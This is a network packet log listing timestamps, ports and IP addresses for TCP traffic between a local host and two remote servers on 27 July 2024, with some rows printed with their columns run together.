Jul 27, 2024 13:31:09.418752909 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.418771982 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.418816090 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.418823004 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.419260979 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.419294119 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.419318914 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.419327021 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.419359922 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.419384956 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.419393063 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.419442892 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.419445992 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.419477940 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.419511080 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.419528961 CEST  49707        57484      192.168.2.5      192.253.251.227
                                                        Jul 27, 2024 13:31:09.419543028 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.419574976 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.419589996 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.474790096 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.742027998 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.742075920 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.742136002 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.742628098 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.742707968 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.742743015 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.742759943 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.742844105 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.742877960 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.742894888 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.742965937 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.743016958 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.743041039 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.743069887 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.743120909 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.743612051 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.743663073 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.743696928 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.743714094 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.743824005 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.743860006 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.743872881 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.744036913 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744087934 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.744138002 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744172096 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744220018 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.744287968 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744319916 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744373083 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.744445086 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744503975 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744546890 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744553089 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.744580030 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744632959 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.744710922 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744746923 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744793892 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.744869947 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744904041 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744937897 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.744951963 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.745109081 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745143890 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745162964 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.745177984 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745230913 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.745248079 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745276928 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745320082 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.745373964 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745408058 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745455980 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.745534897 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745565891 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745598078 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745616913 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.745639086 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745687962 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.745724916 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745759010 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745790958 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745807886 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.745824099 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.745872021 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.746068001 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746100903 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746134043 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746150017 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.746162891 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746196985 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746212959 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.746231079 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746303082 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.746388912 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746422052 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746454000 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746470928 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.746606112 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746639013 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746655941 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.746673107 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746701956 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746723890 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.746942043 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746975899 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.746994019 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.747013092 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747047901 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747062922 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.747082949 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747112036 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747129917 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.747147083 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747179985 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747209072 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.747519970 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747551918 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747574091 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.747587919 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747621059 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747642040 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.747654915 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747687101 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747703075 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.747719049 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747751951 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747785091 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.747791052 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.747838974 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.748094082 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748128891 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748162031 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748174906 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.748195887 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748229027 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748260021 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.748262882 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748296976 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748312950 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.748331070 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748377085 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.748603106 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748652935 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748686075 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748703003 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.748717070 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748750925 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748764992 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.748785019 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748819113 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748830080 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.748847961 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748882055 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748894930 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.748915911 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748949051 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.748970032 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.748980999 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749015093 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749027967 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.749047041 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749078989 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749098063 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.749108076 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749142885 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749151945 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.749176979 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749226093 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.749583960 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749614954 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749648094 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749669075 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.749680996 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749712944 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749732971 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.749747038 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749779940 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749794960 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.749814034 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749841928 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749861956 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.749874115 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749907970 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749926090 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.749942064 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749974966 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.749989986 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.750006914 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750040054 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750058889 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.750068903 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750102997 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750113964 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.750138044 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750164986 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750199080 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.750579119 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750613928 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750633001 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.750647068 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750679016 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750694036 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.750711918 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750744104 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750761986 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.750777006 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750806093 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750823975 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.750839949 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750871897 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750889063 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.750900984 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750935078 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.750941038 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.750967979 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.751015902 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.751147985 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.751182079 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.751211882 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.751229048 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.751240969 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.751274109 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.751288891 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.751307964 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.751355886 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.751378059 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.802911043 CEST4970757484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:09.835350990 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.835449934 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.835484982 CEST5748449707192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:09.835517883 CEST5748449707192.253.251.227192.168.2.5
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Jul 27, 2024 13:31:09.835551023 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.835582018 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.835589886 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.835589886 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.835618019 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.835632086 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.835777998 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.835829973 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.835874081 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.835908890 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.835957050 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.836055994 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.836090088 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.836123943 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.836138964 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.836158037 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.836213112 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.836683989 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.836734056 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.836766958 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.836781979 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.836895943 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.836929083 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.836946011 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.836962938 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.836994886 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.837011099 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:09.837230921 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:09.837285995 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:11.192339897 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:11.197834015 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.197877884 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.197905064 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:11.197906971 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.197921038 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:11.197936058 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.197962999 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:11.197983027 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:11.197988987 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.198019981 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.198046923 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.198337078 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.198575974 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.198692083 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.204974890 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.205050945 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.205079079 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.205224037 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.205250978 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.205277920 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.206518888 CEST  57484        49707      192.253.251.227  192.168.2.5
Jul 27, 2024 13:31:11.206826925 CEST  49707        57484      192.168.2.5      192.253.251.227
Jul 27, 2024 13:31:14.112747908 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:14.112806082 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:14.112880945 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:14.116734028 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:14.116750002 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:14.839318991 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:14.839432001 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:14.843518019 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:14.843534946 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:14.843947887 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:14.875967979 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:14.920502901 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.490451097 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.498392105 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.498404980 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.498475075 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.498497963 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.498553991 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.500010014 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.500034094 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.500082016 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.500089884 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.500226974 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.581290960 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.581319094 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.581363916 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.581379890 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.581413031 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.581427097 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.584562063 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.584582090 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.584633112 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.584640026 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.584886074 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.587635040 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.587654114 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.587691069 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.587698936 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.587714911 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.587728977 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.597244024 CEST  443          49711      93.113.54.56     192.168.2.5
